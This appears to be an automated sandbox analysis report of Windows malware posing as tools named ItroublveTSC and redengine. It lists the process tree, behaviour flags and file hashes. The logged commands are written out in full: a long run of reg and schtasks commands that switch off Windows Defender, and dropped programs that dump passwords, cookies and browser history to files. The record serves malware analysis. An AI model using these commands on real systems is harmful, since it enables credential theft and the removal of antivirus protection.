- Suspicious use of SetWindowsHookEx
PID:4080 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:12⤵PID:1236
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:12⤵PID:4816
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6320 /prefetch:82⤵PID:4672
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3820 /prefetch:82⤵PID:808
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4404 /prefetch:82⤵PID:3748
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6940 /prefetch:82⤵PID:3028
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7024 /prefetch:82⤵PID:4676
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4708
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3512
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\ItroublveTSC.v6.Fix.7.2.rar"1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:784 -
C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.10023\ItroublveTSC.exe"C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.10023\ItroublveTSC.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.16998\ItroublveTSC.exe"C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.16998\ItroublveTSC.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.21969\ItroublveTSC.exe"C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.21969\ItroublveTSC.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.23700\ItroublveTSC.exe"C:\Users\Admin\AppData\Local\Temp\Rar$EXa784.23700\ItroublveTSC.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3996 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://itroublvehacker.ml/usage.php3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1808 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff99ca546f8,0x7ff99ca54708,0x7ff99ca547184⤵PID:2788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:24⤵PID:3132
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2996 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:84⤵PID:4844
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:14⤵PID:4404
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:14⤵PID:4352
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:14⤵PID:2888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4892 /prefetch:84⤵PID:4720
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:14⤵PID:4672
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,2015235117801644900,4621079202967975112,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5084 /prefetch:84⤵PID:2412
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bin_copy\compile.vbs"3⤵
- Checks computer location settings
PID:2344 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:1904
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:/Windows/Microsoft.NET/Framework/v4.0.30319/msbuild.exe TSC.sln5⤵
- Loads dropped DLL
PID:4864 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmpc746152aed724f8dbf24c77d2c92484e.rsp"6⤵PID:636
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE868.tmp" "c:\Users\Admin\AppData\Local\Temp\bin_copy\obj\Debug\CSC8587053F274A4A6499E888C7CC778AD.TMP"7⤵PID:3796
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4644
-
C:\Users\Admin\Documents\redengine.exe"C:\Users\Admin\Documents\redengine.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
PID:180 -
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs680oMYFEXW81xPz/g29TLLVogUfsN5gagDyAdZpsHLlmb/AaqpxQ6PfTc0SoO708ZWUlYUzn13mC2kgEJ5J9I0cZbH51eZOyyY4RlMGAoTHcRTe1ksxUNdc//2ltAHo9I=2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- Checks computer location settings
PID:3496 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4504 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- Checks computer location settings
PID:2332 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeC:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"5⤵
- Executes dropped EXE
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\splwow64.exeC:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"5⤵
- Executes dropped EXE
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\hh.exeC:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4848 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- Checks computer location settings
PID:5116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:2412
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeC:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4424 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"3⤵PID:2268
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4228
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"2⤵PID:3680
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:4424
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:4264
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:3032
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:3380
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5096 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:8 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4560 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:208 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3788 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:4372
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤3⤵PID:1932
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:3824
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2332
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:624
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:3140
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:2932
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:1568
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:2956
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:4668
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:4304
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:5116
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4876
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1536
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2412
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4472
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4528
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:2268
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . C:\Users\Admin\Documents\redengine.exe1⤵
- Executes dropped EXE
PID:4916
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Documents\redenginev5.5.rar"1⤵
- Executes dropped EXE
PID:2176
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . C:\Users\Admin\Documents\redengine.exe1⤵
- Executes dropped EXE
PID:2200
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
PID:4872 -
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4872_1715539824\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4872_1715539824\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={645b6c85-2d5f-4077-a0a1-d52b898939a5} --system2⤵
- Executes dropped EXE
PID:3120
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Documents\redengine.rar"1⤵
- Executes dropped EXE
- Modifies registry class
PID:2532
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . C:\Users\Admin\Documents\redengine.exe1⤵
- Executes dropped EXE
PID:2196
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Documents\redengine5.5.rar"1⤵
- Executes dropped EXE
- Modifies registry class
PID:1184
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Documents\redengine5.5.rar"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4728
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107KB
MD58933d6e810668af29d7ba8f1c3b2b9ff
SHA1760cbb236c4ca6e0003582aaefd72ff8b1c872aa
SHA256cd3ba458c88bdf8924ebb404c8505d627e6ac7aadc6e351562c1894019604fc7
SHA512344d737228483add83d5f2b31ae9582ca78013dc4be967f2cdafca24145970e3cb46d75373996150a3c9119ebc81ce9ac50e16696c17a4dea65c9571ef8e745e
-
Filesize
412KB
MD592667e28583a9489e3cf4f1a7fd6636e
SHA1faa09990ba4daae970038ed44e3841151d6e7f28
SHA2569147293554ad43920bcf763ffd6e1183c36b9f8156dc220548426a187a5f2959
SHA51263555a15f153df59b2ca2ab56cd20d71420eb5c9977bcf774723d8484157172b027f71fb2f7a4692aecc6e471f50beec2e0f7a43e57449714caede1e9684c0b8
-
Filesize
95KB
MD5d4c768c52ee077eb09bac094f4af8310
SHA1c56ae6b4464799fcdc87c5ff5a49ac1ad43482b1
SHA2568089dfbebdf2142c7f60f5c12098859417b3c997f0b24b696ccaa78a50f3726c
SHA5125b794b19b5ff10f7356a46f02204d0df3183037bc89d32e3f2c2978ea8f90ac6367fcb225b476cb7c8a3035d82ca1e328791271d3a58b40b9759d4b65e83f847
-
Filesize
314KB
MD581b236ef16aaa6a3936fd449b12b82a2
SHA1698acb3c862c7f3ecf94971e4276e531914e67bc
SHA256d37819e64ecb61709fcf3435eb9bed790f75163057e36fb94a3465ca353ccc5e
SHA512968fe20d6fe6879939297b8683da1520a1e0d2b9a5107451fca70b91802492e243976f56090c85eb9f38fca8f74134b8b6aa133ba2e2806d763c9f8516ace769
-
Filesize
2.3MB
MD50b114fc0f4b6d49f57b3b01dd9ea6a8c
SHA123e1480c3ff3a54e712d759e9325d362bf52fabd
SHA256f0f312fe14599d7379aa247c1d0cc6100db45bfe7f277113134a8157950bcacd
SHA512e31c3a3da5e72a9d72e245d6e5dcc7c92e4cfcbb6bdbb61061e0586e29f77e8b42a81a0bba99ce45e148a2423907878fb858c40cc1008ef9d90fb8e4e2fcd573
-
Filesize
632KB
MD5650a771d005941c7a23926011d75ad8f
SHA184b346acd006f21d7ffb8d5ea5937ec0ee3daa4f
SHA256b28d116dd3066e7a3c9f0cc2f63d34a7189c9d78e869d1255c9dec59172a9d5f
SHA5124724bd81c26716f0ad59187c78fbb920fd8b251540e76c28d93e0afcce3ebe0e3e2b4605e9d444bbbc3e828ce11f2b73489404318ab11403eff94b42ef2c9bad
-
Filesize
412KB
MD592667e28583a9489e3cf4f1a7fd6636e
SHA1faa09990ba4daae970038ed44e3841151d6e7f28
SHA2569147293554ad43920bcf763ffd6e1183c36b9f8156dc220548426a187a5f2959
SHA51263555a15f153df59b2ca2ab56cd20d71420eb5c9977bcf774723d8484157172b027f71fb2f7a4692aecc6e471f50beec2e0f7a43e57449714caede1e9684c0b8
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e